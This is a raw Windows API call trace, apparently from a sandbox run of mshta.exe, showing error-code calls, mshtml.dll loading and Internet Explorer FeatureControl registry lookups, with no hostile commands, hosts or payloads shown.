[0063.009] SetLastError (dwErrCode=0x0)
[0063.009] GetLastError () returned 0x0
[0063.009] SetLastError (dwErrCode=0x0)
[0063.009] GetLastError () returned 0x0
[0063.009] SetLastError (dwErrCode=0x0)
[0063.009] GetLastError () returned 0x0
[0063.009] SetLastError (dwErrCode=0x0)
[0063.009] GetLastError () returned 0x0
[0063.009] SetLastError (dwErrCode=0x0)
[0063.009] GetLastError () returned 0x0
[0063.009] SetLastError (dwErrCode=0x0)
[0063.010] GetLastError () returned 0x0
[0063.010] SetLastError (dwErrCode=0x0)
[0063.010] GetLastError () returned 0x0
[0063.010] SetLastError (dwErrCode=0x0)
[0063.010] GetLastError () returned 0x0
[0063.010] SetLastError (dwErrCode=0x0)
[0063.010] GetLastError () returned 0x0
[0063.010] SetLastError (dwErrCode=0x0)
[0063.010] GetLastError () returned 0x0
[0063.010] SetLastError (dwErrCode=0x0)
[0063.010] GetLastError () returned 0x0
[0063.010] SetLastError (dwErrCode=0x0)
[0063.010] GetLastError () returned 0x0
[0063.010] SetLastError (dwErrCode=0x0)
[0063.010] GetLastError () returned 0x0
[0063.010] SetLastError (dwErrCode=0x0)
[0063.010] GetLastError () returned 0x0
[0063.010] SetLastError (dwErrCode=0x0)
[0063.010] GetLastError () returned 0x0
[0063.010] SetLastError (dwErrCode=0x0)
[0063.010] GetLastError () returned 0x0
[0063.010] SetLastError (dwErrCode=0x0)
[0063.010] GetLastError () returned 0x0
[0063.010] SetLastError (dwErrCode=0x0)
[0063.010] GetLastError () returned 0x0
[0063.010] SetLastError (dwErrCode=0x0)
[0063.010] GetLastError () returned 0x0
[0063.010] SetLastError (dwErrCode=0x0)
[0063.010] GetLastError () returned 0x0
[0063.010] SetLastError (dwErrCode=0x0)
[0063.010] GetLastError () returned 0x0
[0063.010] SetLastError (dwErrCode=0x0)
[0063.010] GetLastError () returned 0x0
[0063.010] SetLastError (dwErrCode=0x0)
[0063.010] GetLastError () returned 0x0
[0063.010] SetLastError (dwErrCode=0x0)
[0063.010] GetLastError () returned 0x0
[0063.010] SetLastError (dwErrCode=0x0)
[0063.010] GetLastError () returned 0x0
[0063.010] SetLastError (dwErrCode=0x0)
[0063.010] GetLastError () returned 0x0
[0063.010] SetLastError (dwErrCode=0x0)
[0063.010] GetLastError () returned 0x0
[0063.010] SetLastError (dwErrCode=0x0)
[0063.010] GetLastError () returned 0x0
[0063.010] SetLastError (dwErrCode=0x0)
[0063.010] GetLastError () returned 0x0
[0063.010] SetLastError (dwErrCode=0x0)
[0063.010] GetLastError () returned 0x0
[0063.011] SetLastError (dwErrCode=0x0)
[0063.011] GetLastError () returned 0x0
[0063.011] SetLastError (dwErrCode=0x0)
[0063.011] GetLastError () returned 0x0
[0063.011] SetLastError (dwErrCode=0x0)
[0063.011] GetLastError () returned 0x0
[0063.011] SetLastError (dwErrCode=0x0)
[0063.011] GetLastError () returned 0x0
[0063.011] SetLastError (dwErrCode=0x0)
[0063.011] GetLastError () returned 0x0
[0063.011] SetLastError (dwErrCode=0x0)
[0063.011] GetLastError () returned 0x0
[0063.011] SetLastError (dwErrCode=0x0)
[0063.011] GetLastError () returned 0x0
[0063.011] SetLastError (dwErrCode=0x0)
[0063.011] GetLastError () returned 0x0
[0063.011] SetLastError (dwErrCode=0x0)
[0063.013] GetLastError () returned 0x0
[0063.013] SetLastError (dwErrCode=0x0)
[0063.013] GetLastError () returned 0x0
[0063.013] SetLastError (dwErrCode=0x0)
[0063.013] GetLastError () returned 0x0
[0063.013] SetLastError (dwErrCode=0x0)
[0063.013] GetLastError () returned 0x0
[0063.013] SetLastError (dwErrCode=0x0)
[0063.013] GetLastError () returned 0x0
[0063.013] SetLastError (dwErrCode=0x0)
[0063.013] GetLastError () returned 0x0
[0063.013] SetLastError (dwErrCode=0x0)
[0063.013] GetLastError () returned 0x0
[0063.013] SetLastError (dwErrCode=0x0)
[0063.013] GetLastError () returned 0x0
[0063.013] SetLastError (dwErrCode=0x0)
[0063.013] GetLastError () returned 0x0
[0063.013] SetLastError (dwErrCode=0x0)
[0063.013] GetLastError () returned 0x0
[0063.013] SetLastError (dwErrCode=0x0)
[0063.013] GetLastError () returned 0x0
[0063.013] SetLastError (dwErrCode=0x0)
[0063.013] GetLastError () returned 0x0
[0063.013] SetLastError (dwErrCode=0x0)
[0063.013] GetLastError () returned 0x0
[0063.013] SetLastError (dwErrCode=0x0)
[0063.013] GetLastError () returned 0x0
[0063.013] SetLastError (dwErrCode=0x0)
[0063.013] GetLastError () returned 0x0
[0063.013] SetLastError (dwErrCode=0x0)
[0063.013] GetLastError () returned 0x0
[0063.013] SetLastError (dwErrCode=0x0)
[0063.013] GetLastError () returned 0x0
[0063.013] SetLastError (dwErrCode=0x0)
[0063.013] GetLastError () returned 0x0
[0063.013] SetLastError (dwErrCode=0x0)
[0063.013] GetLastError () returned 0x0
[0063.013] SetLastError (dwErrCode=0x0)
[0063.013] GetLastError () returned 0x0
[0063.013] SetLastError (dwErrCode=0x0)
[0063.013] GetLastError () returned 0x0
[0063.013] SetLastError (dwErrCode=0x0)
[0063.013] GetLastError () returned 0x0
[0063.014] SetLastError (dwErrCode=0x0)
[0063.014] GetLastError () returned 0x0
[0063.014] SetLastError (dwErrCode=0x0)
[0063.014] GetLastError () returned 0x0
[0063.014] SetLastError (dwErrCode=0x0)
[0063.014] GetLastError () returned 0x0
[0063.014] SetLastError (dwErrCode=0x0)
[0063.014] GetLastError () returned 0x0
[0063.014] SetLastError (dwErrCode=0x0)
[0063.014] GetLastError () returned 0x0
[0063.014] SetLastError (dwErrCode=0x0)
[0063.014] GetLastError () returned 0x0
[0063.014] SetLastError (dwErrCode=0x0)
[0063.014] GetLastError () returned 0x0
[0063.014] SetLastError (dwErrCode=0x0)
[0063.014] GetLastError () returned 0x0
[0063.014] SetLastError (dwErrCode=0x0)
[0063.014] GetLastError () returned 0x0
[0063.014] SetLastError (dwErrCode=0x0)
[0063.014] GetLastError () returned 0x0
[0063.014] SetLastError (dwErrCode=0x0)
[0063.014] GetLastError () returned 0x0
[0063.014] SetLastError (dwErrCode=0x0)
[0063.014] GetLastError () returned 0x0
[0063.014] SetLastError (dwErrCode=0x0)
[0063.014] GetLastError () returned 0x0
[0063.014] SetLastError (dwErrCode=0x0)
[0063.014] GetLastError () returned 0x0
[0063.014] SetLastError (dwErrCode=0x0)
[0063.014] GetLastError () returned 0x0
[0063.014] SetLastError (dwErrCode=0x0)
[0063.014] GetLastError () returned 0x0
[0063.014] SetLastError (dwErrCode=0x0)
[0063.014] GetLastError () returned 0x0
[0063.014] SetLastError (dwErrCode=0x0)
[0063.014] GetLastError () returned 0x0
[0063.014] SetLastError (dwErrCode=0x0)
[0063.014] GetLastError () returned 0x0
[0063.014] SetLastError (dwErrCode=0x0)
[0063.014] GetLastError () returned 0x0
[0063.014] SetLastError (dwErrCode=0x0)
[0063.014] GetLastError () returned 0x0
[0063.014] SetLastError (dwErrCode=0x0)
[0063.014] GetLastError () returned 0x0
[0063.014] SetLastError (dwErrCode=0x0)
[0063.014] GetLastError () returned 0x0
[0063.014] SetLastError (dwErrCode=0x0)
[0063.014] GetLastError () returned 0x0
[0063.014] SetLastError (dwErrCode=0x0)
[0063.014] GetLastError () returned 0x0
[0063.014] SetLastError (dwErrCode=0x0)
[0063.014] GetLastError () returned 0x0
[0063.015] SetLastError (dwErrCode=0x0)
[0063.015] GetLastError () returned 0x0
[0063.015] SetLastError (dwErrCode=0x0)
[0063.015] GetLastError () returned 0x0
[0063.015] SetLastError (dwErrCode=0x0)
[0063.015] GetLastError () returned 0x0
[0063.015] SetLastError (dwErrCode=0x0)
[0063.015] GetLastError () returned 0x0
[0063.015] SetLastError (dwErrCode=0x0)
[0063.015] GetLastError () returned 0x0
[0063.015] SetLastError (dwErrCode=0x0)
[0063.015] GetLastError () returned 0x0
[0063.015] SetLastError (dwErrCode=0x0)
[0063.015] GetLastError () returned 0x0
[0063.015] SetLastError (dwErrCode=0x0)
[0063.015] GetLastError () returned 0x0
[0063.015] SetLastError (dwErrCode=0x0)
[0063.015] GetLastError () returned 0x0
[0063.015] SetLastError (dwErrCode=0x0)
[0063.015] GetLastError () returned 0x0
[0063.015] SetLastError (dwErrCode=0x0)
[0063.015] GetLastError () returned 0x0
[0063.015] SetLastError (dwErrCode=0x0)
[0063.015] GetLastError () returned 0x0
[0063.015] SetLastError (dwErrCode=0x0)
[0063.015] GetLastError () returned 0x0
[0063.015] SetLastError (dwErrCode=0x0)
[0063.015] GetLastError () returned 0x0
[0063.015] SetLastError (dwErrCode=0x0)
[0063.015] GetLastError () returned 0x0
[0063.015] SetLastError (dwErrCode=0x0)
[0063.015] GetLastError () returned 0x0
[0063.015] SetLastError (dwErrCode=0x0)
[0063.015] GetLastError () returned 0x0
[0063.015] SetLastError (dwErrCode=0x0)
[0063.015] GetLastError () returned 0x0
[0063.015] SetLastError (dwErrCode=0x0)
[0063.016] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xff9d2cc4) returned 0x0
[0063.016] GetLastError () returned 0x0
[0063.016] SetLastError (dwErrCode=0x0)
[0063.016] GetLastError () returned 0x0
[0063.016] SetLastError (dwErrCode=0x0)
[0063.016] GetLastError () returned 0x0
[0063.016] SetLastError (dwErrCode=0x0)
[0063.016] GetLastError () returned 0x0
[0063.016] SetLastError (dwErrCode=0x0)
[0063.016] GetLastError () returned 0x0
[0063.016] SetLastError (dwErrCode=0x0)
[0063.016] GetLastError () returned 0x0
[0063.016] SetLastError (dwErrCode=0x0)
[0063.016] GetLastError () returned 0x0
[0063.016] SetLastError (dwErrCode=0x0)
[0063.016] GetLastError () returned 0x0
[0063.016] SetLastError (dwErrCode=0x0)
[0063.016] GetLastError () returned 0x0
[0063.016] SetLastError (dwErrCode=0x0)
[0063.016] GetLastError () returned 0x0
[0063.016] SetLastError (dwErrCode=0x0)
[0063.016] GetLastError () returned 0x0
[0063.016] SetLastError (dwErrCode=0x0)
[0063.016] GetLastError () returned 0x0
[0063.016] SetLastError (dwErrCode=0x0)
[0063.016] GetLastError () returned 0x0
[0063.016] SetLastError (dwErrCode=0x0)
[0063.016] GetLastError () returned 0x0
[0063.016] SetLastError (dwErrCode=0x0)
[0063.016] GetLastError () returned 0x0
[0063.016] SetLastError (dwErrCode=0x0)
[0063.016] GetLastError () returned 0x0
[0063.016] SetLastError (dwErrCode=0x0)
[0063.016] GetLastError () returned 0x0
[0063.016] SetLastError (dwErrCode=0x0)
[0063.016] GetLastError () returned 0x0
[0063.016] SetLastError (dwErrCode=0x0)
[0063.016] GetLastError () returned 0x0
[0063.016] SetLastError (dwErrCode=0x0)
[0063.016] GetLastError () returned 0x0
[0063.016] SetLastError (dwErrCode=0x0)
[0063.016] GetLastError () returned 0x0
[0063.016] SetLastError (dwErrCode=0x0)
[0063.016] GetLastError () returned 0x0
[0063.016] SetLastError (dwErrCode=0x0)
[0063.016] GetLastError () returned 0x0
[0063.017] SetLastError (dwErrCode=0x0)
[0063.017] GetLastError () returned 0x0
[0063.017] SetLastError (dwErrCode=0x0)
[0063.017] GetLastError () returned 0x0
[0063.017] SetLastError (dwErrCode=0x0)
[0063.017] GetLastError () returned 0x0
[0063.017] SetLastError (dwErrCode=0x0)
[0063.017] GetLastError () returned 0x0
[0063.017] SetLastError (dwErrCode=0x0)
[0063.017] GetLastError () returned 0x0
[0063.017] SetLastError (dwErrCode=0x0)
[0063.017] GetLastError () returned 0x0
[0063.017] SetLastError (dwErrCode=0x0)
[0063.017] GetLastError () returned 0x0
[0063.017] SetLastError (dwErrCode=0x0)
[0063.017] GetLastError () returned 0x0
[0063.017] SetLastError (dwErrCode=0x0)
[0063.017] GetVersion () returned 0x1db10106
[0063.017] GetModuleHandleW (lpModuleName="Kernel32.dll") returned 0x776e0000
[0063.017] GetProcAddress (hModule=0x776e0000, lpProcName="HeapSetInformation") returned 0x776fc4a0
[0063.017] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1
[0063.017] RegOpenKeyExA (in: hKey=0xffffffff80000000, lpSubKey="clsid\\{25336920-03f9-11cf-8fd0-00aa00686f13}\\InProcServer32", ulOptions=0x0, samDesired=0x1, phkResult=0x14f9a8 | out: phkResult=0x14f9a8*=0x2a) returned 0x0
[0063.017] RegQueryValueExA (in: hKey=0x2a, lpValueName=0x0, lpReserved=0x0, lpType=0x14f9a0, lpData=0x635d40, lpcbData=0x14f9a4*=0x105 | out: lpType=0x14f9a0*=0x1, lpData="C:\\Windows\\System32\\mshtml.dll", lpcbData=0x14f9a4*=0x1f) returned 0x0
[0063.018] LoadLibraryA (lpLibFileName="C:\\Windows\\System32\\mshtml.dll") returned 0x7fee0880000
[0063.315] HeapSetInformation (HeapHandle=0x2d0000, HeapInformationClass=0x0, HeapInformation=0x14f3e8, HeapInformationLength=0x4) returned 1
[0063.315] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x14f3b0 | out: lpSystemTimeAsFileTime=0x14f3b0*(dwLowDateTime=0xd5c540f0, dwHighDateTime=0x1d34cee))
[0063.315] GetCurrentProcessId () returned 0xbc8
[0063.315] GetCurrentThreadId () returned 0xbcc
[0063.315] GetTickCount () returned 0x1f23a
[0063.315] QueryPerformanceCounter (in: lpPerformanceCount=0x14f3b8 | out: lpPerformanceCount=0x14f3b8*=480112355) returned 1
[0063.315] GetVersionExA (in: lpVersionInformation=0x14f110*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x14f110*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0063.315] __dllonexit () returned 0x7fee094a28c
[0063.315] __dllonexit () returned 0x7fee094e5b4
[0063.316] __dllonexit () returned 0x7fee0944de0
[0063.316] __dllonexit () returned 0x7fee0944e0c
[0063.316] __dllonexit () returned 0x7fee09478c0
[0063.316] __dllonexit () returned 0x7fee0949f60
[0063.316] __dllonexit () returned 0x7fee0944dac
[0063.357] __dllonexit () returned 0x7fee094a204
[0063.357] __dllonexit () returned 0x7fee0944dc0
[0063.357] __dllonexit () returned 0x7fee09445c0
[0063.357] __dllonexit () returned 0x7fee09445d0
[0063.357] RegisterClipboardFormatW (lpszFormat="CF_RTF") returned 0xc193
[0063.357] RegisterClipboardFormatW (lpszFormat="CF_RTF") returned 0xc193
[0063.357] __dllonexit () returned 0x7fee0944600
[0063.357] __dllonexit () returned 0x7fee0944630
[0063.357] __dllonexit () returned 0x7fee0944670
[0063.357] __dllonexit () returned 0x7fee0944690
[0063.357] __dllonexit () returned 0x7fee09446c0
[0063.357] __dllonexit () returned 0x7fee0949fd0
[0063.357] __dllonexit () returned 0x7fee09446e0
[0063.357] __dllonexit () returned 0x7fee0944700
[0063.357] __dllonexit () returned 0x7fee0944720
[0063.357] __dllonexit () returned 0x7fee0944740
[0063.357] __dllonexit () returned 0x7fee0944760
[0063.358] __dllonexit () returned 0x7fee094a000
[0063.358] __dllonexit () returned 0x7fee0944780
[0063.358] __dllonexit () returned 0x7fee09447a0
[0063.358] __dllonexit () returned 0x7fee09447d0
[0063.358] __dllonexit () returned 0x7fee09447f0
[0063.358] __dllonexit () returned 0x7fee0944810
[0063.358] __dllonexit () returned 0x7fee0944830
[0063.358] __dllonexit () returned 0x7fee0944850
[0063.358] __dllonexit () returned 0x7fee0944870
[0063.358] __dllonexit () returned 0x7fee0944890
[0063.358] __dllonexit () returned 0x7fee09448b0
[0063.358] __dllonexit () returned 0x7fee09448d0
[0063.358] __dllonexit () returned 0x7fee09448f0
[0063.358] __dllonexit () returned 0x7fee0944910
[0063.358] __dllonexit () returned 0x7fee0944930
[0063.358] __dllonexit () returned 0x7fee0944950
[0063.358] __dllonexit () returned 0x7fee0944970
[0063.358] __dllonexit () returned 0x7fee0944990
[0063.358] __dllonexit () returned 0x7fee09449b0
[0063.358] __dllonexit () returned 0x7fee09449d0
[0063.359] __dllonexit () returned 0x7fee09449f0
[0063.359] __dllonexit () returned 0x7fee0944a10
[0063.359] __dllonexit () returned 0x7fee0944a40
[0063.359] __dllonexit () returned 0x7fee0944a70
[0063.359] __dllonexit () returned 0x7fee0944aa0
[0063.359] MulDiv (nNumber=1073741823, nNumerator=384, nDenominator=1440) returned 286331153
[0063.359] MulDiv (nNumber=1073741823, nNumerator=384, nDenominator=1440) returned 286331153
[0063.359] __dllonexit () returned 0x7fee0944ab0
[0063.359] __dllonexit () returned 0x7fee094a0d0
[0063.359] __dllonexit () returned 0x7fee0944ae0
[0063.359] __dllonexit () returned 0x7fee0944af0
[0063.359] __dllonexit () returned 0x7fee0944b10
[0063.359] __dllonexit () returned 0x7fee0944b30
[0063.359] __dllonexit () returned 0x7fee094a100
[0063.359] __dllonexit () returned 0x7fee0944b50
[0063.359] __dllonexit () returned 0x7fee0944b70
[0063.360] __dllonexit () returned 0x7fee0944b90
[0063.360] __dllonexit () returned 0x7fee0944bb0
[0063.360] __dllonexit () returned 0x7fee0944bd0
[0063.360] __dllonexit () returned 0x7fee0944bf0
[0063.360] __dllonexit () returned 0x7fee0944c10
[0063.360] __dllonexit () returned 0x7fee0944c30
[0063.367] __dllonexit () returned 0x7fee0944c50
[0063.367] __dllonexit () returned 0x7fee0944c70
[0063.367] __dllonexit () returned 0x7fee0944c90
[0063.367] __dllonexit () returned 0x7fee0944cb0
[0063.367] __dllonexit () returned 0x7fee0944cd0
[0063.367] __dllonexit () returned 0x7fee094e500
[0063.367] __dllonexit () returned 0x7fee0944cf0
[0063.367] __dllonexit () returned 0x7fee094a150
[0063.367] __dllonexit () returned 0x7fee094a190
[0063.367] __dllonexit () returned 0x7fee0944d1c
[0063.368] __dllonexit () returned 0x7fee0944d3c
[0063.368] __dllonexit () returned 0x7fee0944d50
[0063.368] GetCurrentThreadId () returned 0xbcc
[0063.368] CoCreateGuid (in: pguid=0x7fee10449d0 | out: pguid=0x7fee10449d0*(Data1=0x583236f6, Data2=0x5b5f, Data3=0x458a, Data4=([0]=0xb2, [1]=0x1b, [2]=0xc6, [3]=0xf6, [4]=0x32, [5]=0x23, [6]=0x5d, [7]=0xd5))) returned 0x0
[0063.370] __dllonexit () returned 0x7fee094a1b8
[0063.370] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x14eac0, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\mshta.exe" (normalized: "c:\\windows\\system32\\mshta.exe")) returned 0x1d
[0063.371] PathFindFileNameW (pszPath="C:\\Windows\\System32\\mshta.exe") returned="mshta.exe"
[0063.371] StrCmpICW (pszStr1="mshta.exe", pszStr2="iexplore.exe") returned 4
[0063.371] StrCmpICW (pszStr1="mshta.exe", pszStr2="explorer.exe") returned 8
[0063.377] LocalAlloc (uFlags=0x40, uBytes=0x14) returned 0x2fa8c0
[0063.377] SHRegGetValueW () returned 0x2
[0063.377] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Policies\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x14ed48 | out: phkResult=0x14ed48*=0x0) returned 0x2
[0063.377] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Policies\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x14ed50 | out: phkResult=0x14ed50*=0x0) returned 0x2
[0063.377] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x14ed58 | out: phkResult=0x14ed58*=0x78) returned 0x0
[0063.378] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x14ed60 | out: phkResult=0x14ed60*=0x7c) returned 0x0
[0063.388] RegOpenKeyExW (in: hKey=0x7c, lpSubKey="FEATURE_CSS_DATA_RESPECTS_XSS_ZONE_SETTING_KB912120", ulOptions=0x0, samDesired=0x1, phkResult=0x14ece8 | out: phkResult=0x14ece8*=0x0) returned 0x2
[0063.389] RegOpenKeyExW (in: hKey=0x78, lpSubKey="FEATURE_CSS_DATA_RESPECTS_XSS_ZONE_SETTING_KB912120", ulOptions=0x0, samDesired=0x1, phkResult=0x14ece8 | out: phkResult=0x14ece8*=0x0) returned 0x2
[0063.389] RegCloseKey (hKey=0x0) returned 0x6
[0063.389] RegCloseKey (hKey=0x0) returned 0x6
[0063.389] RegCloseKey (hKey=0x78) returned 0x0
[0063.389] RegCloseKey (hKey=0x7c) returned 0x0
[0063.389] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x14ed58 | out: phkResult=0x14ed58*=0x7c) returned 0x0
[0063.389] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x14ed60 | out: phkResult=0x14ed60*=0x78) returned 0x0
[0063.389] RegOpenKeyExW (in: hKey=0x78, lpSubKey="FEATURE_EXTERNAL_STYLE_SHEET_FIX_FOR_SMARTNAVIGATION_KB926131", ulOptions=0x0, samDesired=0x1, phkResult=0x14ece8 | out: phkResult=0x14ece8*=0x0) returned 0x2
[0063.389] RegOpenKeyExW (in: hKey=0x7c, lpSubKey="FEATURE_EXTERNAL_STYLE_SHEET_FIX_FOR_SMARTNAVIGATION_KB926131", ulOptions=0x0, samDesired=0x1, phkResult=0x14ece8 | out: phkResult=0x14ece8*=0x0) returned 0x2
[0063.389] RegCloseKey (hKey=0x0) returned 0x6
[0063.389] RegCloseKey (hKey=0x0) returned 0x6
[0063.389] RegCloseKey (hKey=0x7c) returned 0x0
[0063.389] RegCloseKey (hKey=0x78) returned 0x0
[0063.389] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x14ed58 | out: phkResult=0x14ed58*=0x78) returned 0x0
[0063.389] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x14ed60 | out: phkResult=0x14ed60*=0x7c) returned 0x0
[0063.389] RegOpenKeyExW (in: hKey=0x7c, lpSubKey="FEATURE_ARIA_SUPPORT", ulOptions=0x0, samDesired=0x1, phkResult=0x14ece8 | out: phkResult=0x14ece8*=0x0) returned 0x2
[0063.389] RegOpenKeyExW (in: hKey=0x78, lpSubKey="FEATURE_ARIA_SUPPORT", ulOptions=0x0, samDesired=0x1, phkResult=0x14ece8 | out: phkResult=0x14ece8*=0x0) returned 0x2
[0063.389] RegCloseKey (hKey=0x0) returned 0x6
[0063.389] RegCloseKey (hKey=0x0) returned 0x6
[0063.389] RegCloseKey (hKey=0x78) returned 0x0
[0063.389] RegCloseKey (hKey=0x7c) returned 0x0
[0063.389] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x14ed58 | out: phkResult=0x14ed58*=0x7c) returned 0x0
[0063.389] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x14ed60 | out: phkResult=0x14ed60*=0x78) returned 0x0
[0063.389] RegOpenKeyExW (in: hKey=0x78, lpSubKey="FEATURE_LEGACY_DISPPARAMS", ulOptions=0x0, samDesired=0x1, phkResult=0x14ece8 | out: phkResult=0x14ece8*=0x0) returned 0x2
[0063.389] RegOpenKeyExW (in: hKey=0x7c, lpSubKey="FEATURE_LEGACY_DISPPARAMS", ulOptions=0x0, samDesired=0x1, phkResult=0x14ece8 | out: phkResult=0x14ece8*=0x80) returned 0x0
[0063.389] SHRegGetValueW () returned 0x2
[0063.390] SHRegGetValueW () returned 0x2
[0063.390] RegCloseKey (hKey=0x80) returned 0x0
[0063.390] RegCloseKey (hKey=0x0) returned 0x6
[0063.390] RegCloseKey (hKey=0x0) returned 0x6
[0063.390] RegCloseKey (hKey=0x7c) returned 0x0
[0063.390] RegCloseKey (hKey=0x78) returned 0x0
[0063.390] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x14ed58 | out: phkResult=0x14ed58*=0x78) returned 0x0
[0063.390] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x14ed60 | out: phkResult=0x14ed60*=0x7c) returned 0x0
[0063.390] RegOpenKeyExW (in: hKey=0x7c, lpSubKey="FEATURE_PRIVATE_FONT_SETTING", ulOptions=0x0, samDesired=0x1, phkResult=0x14ece8 | out: phkResult=0x14ece8*=0x0) returned 0x2
[0063.390] RegOpenKeyExW (in: hKey=0x78, lpSubKey="FEATURE_PRIVATE_FONT_SETTING", ulOptions=0x0, samDesired=0x1, phkResult=0x14ece8 | out: phkResult=0x14ece8*=0x0) returned 0x2
[0063.390] RegCloseKey (hKey=0x0) returned 0x6
[0063.390] RegCloseKey (hKey=0x0) returned 0x6
[0063.390] RegCloseKey (hKey=0x78) returned 0x0
[0063.390] RegCloseKey (hKey=0x7c) returned 0x0
[0063.390] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x14ed58 | out: phkResult=0x14ed58*=0x7c) returned 0x0
[0063.390] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x14ed60 | out: phkResult=0x14ed60*=0x78) returned 0x0
[0063.390] RegOpenKeyExW (in: hKey=0x78, lpSubKey="FEATURE_CSS_SHOW_HIDE_EVENTS", ulOptions=0x0, samDesired=0x1, phkResult=0x14ece8 | out: phkResult=0x14ece8*=0x0) returned 0x2
[0063.390] RegOpenKeyExW (in: hKey=0x7c, lpSubKey="FEATURE_CSS_SHOW_HIDE_EVENTS", ulOptions=0x0, samDesired=0x1, phkResult=0x14ece8 | out: phkResult=0x14ece8*=0x0) returned 0x2
[0063.390] RegCloseKey (hKey=0x0) returned 0x6
[0063.390] RegCloseKey (hKey=0x0) returned 0x6
[0063.390] RegCloseKey (hKey=0x7c) returned 0x0
[0063.390] RegCloseKey (hKey=0x78) returned 0x0
[0063.390] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x14ed58 | out: phkResult=0x14ed58*=0x78) returned 0x0
[0063.390] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x14ed60 | out: phkResult=0x14ed60*=0x7c) returned 0x0
[0063.390] RegOpenKeyExW (in: hKey=0x7c, lpSubKey="FEATURE_DISPLAY_NODE_ADVISE_KB833311", ulOptions=0x0, samDesired=0x1, phkResult=0x14ece8 | out: phkResult=0x14ece8*=0x0) returned 0x2
[0063.390] RegOpenKeyExW (in: hKey=0x78, lpSubKey="FEATURE_DISPLAY_NODE_ADVISE_KB833311", ulOptions=0x0, samDesired=0x1, phkResult=0x14ece8 | out: phkResult=0x14ece8*=0x0) returned 0x2
[0063.390] RegCloseKey (hKey=0x0) returned 0x6
[0063.390] RegCloseKey (hKey=0x0) returned 0x6
[0063.390] RegCloseKey (hKey=0x78) returned 0x0
[0063.390] RegCloseKey (hKey=0x7c) returned 0x0
[0063.390] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x14ed58 | out: phkResult=0x14ed58*=0x7c) returned 0x0
[0063.391] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x14ed60 | out: phkResult=0x14ed60*=0x78) returned 0x0
[0063.391] RegOpenKeyExW (in: hKey=0x78, lpSubKey="FEATURE_ALLOW_EXPANDURI_BYPASS", ulOptions=0x0, samDesired=0x1, phkResult=0x14ece8 | out: phkResult=0x14ece8*=0x0) returned 0x2
[0063.391] RegOpenKeyExW (in: hKey=0x7c, lpSubKey="FEATURE_ALLOW_EXPANDURI_BYPASS", ulOptions=0x0, samDesired=0x1, phkResult=0x14ece8 | out: phkResult=0x14ece8*=0x0) returned 0x2
[0063.391] RegCloseKey (hKey=0x0) returned 0x6
[0063.391] RegCloseKey (hKey=0x0) returned 0x6
[0063.391] RegCloseKey (hKey=0x7c) returned 0x0
[0063.391] RegCloseKey (hKey=0x78) returned 0x0
